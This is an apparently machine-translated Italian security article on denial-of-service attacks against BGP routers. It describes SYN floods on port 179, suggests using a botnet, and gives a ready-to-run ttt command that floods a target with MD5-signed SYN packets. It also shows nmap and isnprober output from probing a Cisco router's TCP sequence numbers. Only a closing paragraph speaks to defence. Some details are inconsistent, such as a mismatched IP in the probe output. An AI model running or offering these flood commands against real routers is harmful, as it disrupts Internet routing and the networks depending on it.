Attacchi DoS "ciechi" ai router BGP.
Chiameremo ciechi quegli attacchi che non richiedono alcuna conoscenza aggiuntiva oltre ALL'indirizzo IP del router BGP. Lo scenario più semplice per un tale attacco DoS è SYN flood sulla porta TCP 179. Per implementare un attacco simile a un router industriale, è necessario utilizzare diverse dozzine di computer e, meglio, una botnet.
Un modo più interessante per» inondare " un router BGP di destinazione che utilizza L'autenticazione MD5 consiste nell'applicare pacchetti TCP SYN con firme MD5. Questo attacco consente di aggiungere un carico di elaborazione ALL'elaborazione MD5 da parte del router attaccato.
Tale attacco è facile da eseguire utilizzando l'utilità ttt con l'opzione md5. Per ottimizzare le inondazioni, è necessario eseguire più istanze ttt su diverse dozzine di macchine.
Ecco un esempio di utilizzo dell'utilità ttt:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5
allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y
179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
Quando si parla di hardware prodotto da Cisco Systems, è necessario menzionare la possibilità di implementare attacchi di overflow dello stack TCP/IP IOS. Per identificare tali vulnerabilità, è possibile utilizzare Scanner di vulnerabilità come Nmap, hping2 e isnprober.
Ecco un esempio per un router Cisco 2600:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: class="truly" random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port ISN Delta
192.168.66.202:23 -1154503313
192.168.66.202:23 -24125463 1130377850
192.168.66.202:23 2031059534 2055184997
192.168.66.202:23 965205234 -1065854300
192.168.66.202:23 -1974685094 -2939890328
192.168.66.202:23 1760147902 3734832996
192.168.66.202:23 2089287258 329139356
192.168.66.202:23 -923724721 -3013011979
192.168.66.202:23 -934490140 -10765419
192.168.66.202:23 -1262713275 -328223135
In generale, il protocollo di routing BGP versione 4 è parte integrante di Internet moderno e, di conseguenza, i problemi nel funzionamento di questo protocollo influenzeranno sicuramente il funzionamento della rete globale. Pertanto, se le responsabilità dell'amministratore di sistema includono la manutenzione dei router che lavorano con BGP (di norma, si tratta di società ISP), è necessario prendere sul serio le possibili minacce e adottare misure preventive per proteggerle.
Oleg Petukhov, avvocato nel campo del diritto internazionale e della protezione dei dati personali, specialista nel campo dell'informazione sicurezza, protezione delle informazioni e dei dati personali.
Canale Telegram: https://t.me/protezionedelleinformazioni
Gruppo in telegramma: https://t.me/protezionedelleinformazioni1
Sito: https://legascom.ru
E-mail: online@legascom.ru
#protezionedelleInformazioni #sicurezzadelleinformazioni




